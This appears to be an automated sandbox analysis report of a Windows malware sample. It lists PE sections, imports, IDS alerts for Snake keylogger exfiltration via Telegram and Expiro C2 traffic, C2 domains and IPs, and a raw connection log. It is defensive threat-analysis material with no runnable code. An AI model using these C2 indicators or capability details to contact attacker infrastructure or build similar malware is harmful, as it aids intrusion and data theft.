                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                        .text0x10000x8dcc40x8de00a9b73b76d244f177fa9d7f8d6a7d4ba2False0.5728679102422908data6.676127090218108IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .rsrc0xc70000x27f700x28000cf94e7bb4726001ff5072195070f3eb5False0.835650634765625data7.645692491644237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .reloc0xef0000x960000x950005b73124c49229cc284c6e892ed245adfFalse0.9705409107592282data7.9204863406628485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                        RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                        RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                        RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                        RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                                                        RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                                                        RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                                                        RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                                                        RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                                                        RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                                                        RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                                                        RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                                                        RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                                                                                        RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                                                        RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                                                        RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                                                        RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                        RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                        RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                                                        RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                                        RT_RCDATA0xcf7b80x1f237data1.0003606626784691
                                                                                                                                                        RT_GROUP_ICON0xee9f00x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                                                        RT_GROUP_ICON0xeea680x14dataEnglishGreat Britain1.25
                                                                                                                                                        RT_GROUP_ICON0xeea7c0x14dataEnglishGreat Britain1.15
                                                                                                                                                        RT_GROUP_ICON0xeea900x14dataEnglishGreat Britain1.25
                                                                                                                                                        RT_VERSION0xeeaa40xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                                        RT_MANIFEST0xeeb800x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                                                                        DLLImport
                                                                                                                                                        WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                                                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                                                        WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                                                        PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                                        USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                                                        UxTheme.dllIsThemeActive
                                                                                                                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                                                        USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                                                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                                                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                                                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                        EnglishGreat Britain
                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                        2025-01-10T21:40:55.160825+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149705158.101.44.24280TCP
                                                                                                                                                        2025-01-10T21:41:02.540229+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149705158.101.44.24280TCP
                                                                                                                                                        2025-01-10T21:41:03.863721+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1149711149.154.167.220443TCP
                                                                                                                                                        2025-01-10T21:41:04.450864+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1149711149.154.167.220443TCP
                                                                                                                                                        2025-01-10T21:41:07.190805+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.114971318.141.10.10780TCP
                                                                                                                                                        2025-01-10T21:41:07.296417+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.1149713TCP
                                                                                                                                                        2025-01-10T21:41:07.296417+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.1149713TCP
                                                                                                                                                        2025-01-10T21:41:34.229522+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.1149717TCP
                                                                                                                                                        2025-01-10T21:41:34.229522+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.1149717TCP
                                                                                                                                                        2025-01-10T21:41:34.264252+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.11587001.1.1.153UDP
                                                                                                                                                        2025-01-10T21:41:36.323846+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.11558871.1.1.153UDP
                                                                                                                                                        2025-01-10T21:42:22.641223+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.114981382.112.184.19780TCP
                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Jan 10, 2025 21:40:42.790458918 CET4970380192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:40:42.795424938 CET804970354.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:42.795497894 CET4970380192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:40:42.798125029 CET4970380192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:40:42.798156977 CET4970380192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:40:42.802956104 CET804970354.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:42.802968025 CET804970354.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:43.150589943 CET4970480192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:40:43.159796000 CET804970454.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:43.159868956 CET4970480192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:40:43.164129019 CET4970480192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:40:43.164148092 CET4970480192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:40:43.168947935 CET804970454.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:43.168961048 CET804970454.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:50.017003059 CET4970480192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:40:50.160923958 CET4970580192.168.2.11158.101.44.242
                                                                                                                                                        Jan 10, 2025 21:40:50.165903091 CET8049705158.101.44.242192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:50.167638063 CET4970580192.168.2.11158.101.44.242
                                                                                                                                                        Jan 10, 2025 21:40:50.177288055 CET4970580192.168.2.11158.101.44.242
                                                                                                                                                        Jan 10, 2025 21:40:50.182554007 CET8049705158.101.44.242192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:53.560585022 CET8049705158.101.44.242192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:53.565746069 CET4970580192.168.2.11158.101.44.242
                                                                                                                                                        Jan 10, 2025 21:40:53.570606947 CET8049705158.101.44.242192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:55.112729073 CET8049705158.101.44.242192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:55.160825014 CET4970580192.168.2.11158.101.44.242
                                                                                                                                                        Jan 10, 2025 21:40:55.169018030 CET49706443192.168.2.11104.21.64.1
                                                                                                                                                        Jan 10, 2025 21:40:55.169074059 CET44349706104.21.64.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:55.169150114 CET49706443192.168.2.11104.21.64.1
                                                                                                                                                        Jan 10, 2025 21:40:55.177479029 CET49706443192.168.2.11104.21.64.1
                                                                                                                                                        Jan 10, 2025 21:40:55.177522898 CET44349706104.21.64.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:55.650257111 CET44349706104.21.64.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:55.650351048 CET49706443192.168.2.11104.21.64.1
                                                                                                                                                        Jan 10, 2025 21:40:55.656003952 CET49706443192.168.2.11104.21.64.1
                                                                                                                                                        Jan 10, 2025 21:40:55.656030893 CET44349706104.21.64.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:55.656420946 CET44349706104.21.64.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:55.707686901 CET49706443192.168.2.11104.21.64.1
                                                                                                                                                        Jan 10, 2025 21:40:55.722836971 CET49706443192.168.2.11104.21.64.1
                                                                                                                                                        Jan 10, 2025 21:40:55.763341904 CET44349706104.21.64.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:55.855232000 CET44349706104.21.64.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:55.855303049 CET44349706104.21.64.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:55.855413914 CET49706443192.168.2.11104.21.64.1
                                                                                                                                                        Jan 10, 2025 21:40:55.891876936 CET49706443192.168.2.11104.21.64.1
                                                                                                                                                        Jan 10, 2025 21:41:01.080146074 CET4970580192.168.2.11158.101.44.242
                                                                                                                                                        Jan 10, 2025 21:41:01.085164070 CET8049705158.101.44.242192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:02.493897915 CET8049705158.101.44.242192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:02.540229082 CET4970580192.168.2.11158.101.44.242
                                                                                                                                                        Jan 10, 2025 21:41:02.604643106 CET49711443192.168.2.11149.154.167.220
                                                                                                                                                        Jan 10, 2025 21:41:02.604693890 CET44349711149.154.167.220192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:02.604763031 CET49711443192.168.2.11149.154.167.220
                                                                                                                                                        Jan 10, 2025 21:41:02.605897903 CET49711443192.168.2.11149.154.167.220
                                                                                                                                                        Jan 10, 2025 21:41:02.605910063 CET44349711149.154.167.220192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:03.762895107 CET44349711149.154.167.220192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:03.762978077 CET49711443192.168.2.11149.154.167.220
                                                                                                                                                        Jan 10, 2025 21:41:03.789438963 CET49711443192.168.2.11149.154.167.220
                                                                                                                                                        Jan 10, 2025 21:41:03.789463043 CET44349711149.154.167.220192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:03.789827108 CET44349711149.154.167.220192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:03.823100090 CET49711443192.168.2.11149.154.167.220
                                                                                                                                                        Jan 10, 2025 21:41:03.863337040 CET44349711149.154.167.220192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:03.863573074 CET49711443192.168.2.11149.154.167.220
                                                                                                                                                        Jan 10, 2025 21:41:03.863586903 CET44349711149.154.167.220192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:04.139394999 CET804970354.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:04.139602900 CET4970380192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:04.139602900 CET4970380192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:04.144479036 CET804970354.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:04.158685923 CET4971280192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:04.163547993 CET804971254.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:04.163671017 CET4971280192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:04.163836002 CET4971280192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:04.163865089 CET4971280192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:04.168608904 CET804971254.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:04.168618917 CET804971254.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:04.450917959 CET44349711149.154.167.220192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:04.451008081 CET44349711149.154.167.220192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:04.451086998 CET49711443192.168.2.11149.154.167.220
                                                                                                                                                        Jan 10, 2025 21:41:04.451709986 CET49711443192.168.2.11149.154.167.220
                                                                                                                                                        Jan 10, 2025 21:41:05.678448915 CET4971280192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:05.812196970 CET4971380192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:05.817214966 CET804971318.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:05.818454981 CET4971380192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:05.818629026 CET4971380192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:05.818687916 CET4971380192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:05.823427916 CET804971318.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:05.823462009 CET804971318.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:07.190619946 CET804971318.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:07.190725088 CET804971318.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:07.190804958 CET4971380192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:07.291613102 CET4971380192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:07.296416998 CET804971318.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:08.434799910 CET4971480192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:08.439754009 CET804971454.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:08.439924955 CET4971480192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:08.440536976 CET4971480192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:08.440536976 CET4971480192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:08.445373058 CET804971454.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:08.445405006 CET804971454.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:29.832492113 CET804971454.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:29.832592010 CET4971480192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:29.832695961 CET4971480192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:29.837511063 CET804971454.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:29.905929089 CET4971580192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:29.910712004 CET804971554.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:29.911034107 CET4971580192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:29.911083937 CET4971580192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:29.911083937 CET4971580192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:29.915874958 CET804971554.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:29.915890932 CET804971554.244.188.177192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:33.692593098 CET4971580192.168.2.1154.244.188.177
                                                                                                                                                        Jan 10, 2025 21:41:33.742449045 CET4971780192.168.2.1144.221.84.105
                                                                                                                                                        Jan 10, 2025 21:41:33.747297049 CET804971744.221.84.105192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:33.747379065 CET4971780192.168.2.1144.221.84.105
                                                                                                                                                        Jan 10, 2025 21:41:33.747525930 CET4971780192.168.2.1144.221.84.105
                                                                                                                                                        Jan 10, 2025 21:41:33.747538090 CET4971780192.168.2.1144.221.84.105
                                                                                                                                                        Jan 10, 2025 21:41:33.752342939 CET804971744.221.84.105192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:33.752360106 CET804971744.221.84.105192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:34.224201918 CET804971744.221.84.105192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:34.224478960 CET804971744.221.84.105192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:34.224591017 CET4971780192.168.2.1144.221.84.105
                                                                                                                                                        Jan 10, 2025 21:41:34.224710941 CET4971780192.168.2.1144.221.84.105
                                                                                                                                                        Jan 10, 2025 21:41:34.229521990 CET804971744.221.84.105192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:34.316467047 CET4971880192.168.2.1172.52.178.23
                                                                                                                                                        Jan 10, 2025 21:41:34.321388006 CET804971872.52.178.23192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:34.321537971 CET4971880192.168.2.1172.52.178.23
                                                                                                                                                        Jan 10, 2025 21:41:34.321671009 CET4971880192.168.2.1172.52.178.23
                                                                                                                                                        Jan 10, 2025 21:41:34.321671009 CET4971880192.168.2.1172.52.178.23
